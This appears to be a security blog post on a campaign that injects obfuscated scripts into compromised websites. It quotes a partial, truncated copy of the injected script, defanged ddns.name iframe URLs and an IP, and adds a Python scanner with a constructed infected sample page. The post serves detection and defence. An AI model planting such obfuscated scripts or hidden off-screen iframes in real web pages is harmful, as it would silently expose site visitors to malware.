Just a quick review of a hacker attack that I came across this week.
The attackers inject a malicious script into legitimate web pages on compromised sites and update the script several times a day (sometimes they change the script code and sometimes they just make sure the script is still there, in case webmasters removed it). A typical script looks like this:
var $E=(Date);if($E){$f=['2*%0)%5}%1','%3{%b(%9_%8...skipped...(1))[$s.$Aj]($l[$0][$s.$1k](0,1));}}return this;},$3=$l(),$f='';$pi('l\x65\x6E\x67th');if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('s cript').length > 0){document.wr ite('<i frame src="'+document.getElementById('____Uy').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}
The scripts create invisible iframes that load malicious content from subdomains of ddns.name (a free dynamic DNS service), e.g.:
<i frame src="hxxp://npputdzykop .ddns .name/index.php?showtopic=892380" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>
hxxp://bacmdmrnxdf .ddns .name/index.php?showtopic=892380
hxxp://hjuusnhqspt .ddns .name/index.php?showtopic=892380
hxxp://kmkyqilckhi .ddns .name/index.php?showtopic=892380
hxxp://npputdzykop .ddns .name/index.php?showtopic=892380
hxxp://jnobuznhccv .ddns .name/index.php?showtopic=892380
…
Last time I checked, the malicious subdomains pointed to 37.59.74.146.
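To make the indicators above usable for a site check, here is an added example (written for this note, not the attackers' code or a vendor tool) that scans an HTML document for the two artifacts described: an inline script that combines hex-escaped string obfuscation with document.write() of an iframe, and iframes that are pushed off screen with the fixed/negative-top/hidden style or that load from a subdomain of ddns.name. The two sample pages are constructed, with URLs defanged (hxxp) the way they are in this post; the markers and thresholds (three consecutive \xNN escapes, the style keywords) are my assumptions, tuned to the sample in this write-up rather than a general signature.

```python
import re

# Indicators taken from the write-up: iframes load from throwaway subdomains of the
# free dynamic-DNS zone ddns.name and are hidden with a fixed, off-screen inline style.
DDNS_ZONE = "ddns.name"
HIDDEN_STYLE_MARKERS = ("visibility:hidden", "top:-", "left:-", "display:none")

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")
HOST_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//([^/:?#]+)", re.IGNORECASE)
# Three or more \xNN escapes in a row, as in the 'l\x65\x6E\x67th' trick in the sample.
# The threshold is an assumption, not a rule from the post.
HEX_RUN_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){3,}")


def attrs_of(tag_body):
    """Parse quoted attributes of one tag into a lower-cased dict."""
    return {k.lower(): v for k, v in ATTR_RE.findall(tag_body)}


def is_hidden_style(style):
    """True if the inline style pushes the element off screen or hides it."""
    compact = re.sub(r"\s+", "", style.lower())
    return any(marker in compact for marker in HIDDEN_STYLE_MARKERS)


def host_of(src):
    """Hostname of a (possibly defanged, e.g. hxxp://) URL, or '' if none."""
    m = HOST_RE.match(src.strip())
    return m.group(1).lower() if m else ""


def under_ddns(host):
    return host == DDNS_ZONE or host.endswith("." + DDNS_ZONE)


def scan_html(html):
    """Return a list of findings for one HTML document."""
    findings = []
    # 1. Inline scripts that both use hex-escaped strings and document.write() an
    #    iframe: the combination seen in the injected code.
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        obfuscated = HEX_RUN_RE.search(body) is not None
        writes_iframe = "document.write(" in body and "<iframe" in body.lower()
        if obfuscated and writes_iframe:
            findings.append({"type": "script", "reason": "hex-escaped script writes an iframe"})
    # 2. Static iframes that are hidden or point into the ddns.name zone. Script
    #    bodies are blanked first so the iframe template inside the injected script
    #    is not counted a second time.
    for m in IFRAME_RE.finditer(SCRIPT_RE.sub("", html)):
        attrs = attrs_of(m.group(1))
        host = host_of(attrs.get("src", ""))
        hidden = is_hidden_style(attrs.get("style", ""))
        ddns = under_ddns(host)
        if hidden or ddns:
            findings.append({"type": "iframe", "host": host, "hidden": hidden, "ddns": ddns})
    return findings


# Constructed sample pages, not captured ones. URLs are defanged (hxxp) as in the post.
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="https://www.example.com/embed/video" width="560" height="315"></iframe>
<script>console.log("hello");</script></body></html>"""

INFECTED_PAGE = r"""<html><body><h1>Welcome</h1>
<span id="____Uy" style="display:none">hxxp://npputdzykop.ddns.name/index.php?showtopic=892380</span>
<script>var $E=(Date);$pi('l\x65\x6E\x67th');if(document.getElementsByTagName('script').length>0){document.write('<iframe src="'+document.getElementById('____Uy').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}</script>
<iframe src="hxxp://bacmdmrnxdf.ddns.name/index.php?showtopic=892380" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_html(page))
```

Run it over a saved copy of each page from the site (a crawl of the document root is the practical input); a hit on the script check is the stronger signal, since a hidden iframe on its own has legitimate uses, and the host list from the iframe findings is what to take to DNS and proxy logs.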
When Google detects such malware on websites, you will see the following (or similar) messages on Safe Browsing diagnostic pages:
Malicious software is hosted on 7 domain(s), including hyyjkhfgmxk .ddns .name/, google-‐analytics .com/, kmkyqilckhi.ddns.name/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including google‐‐analytics .com/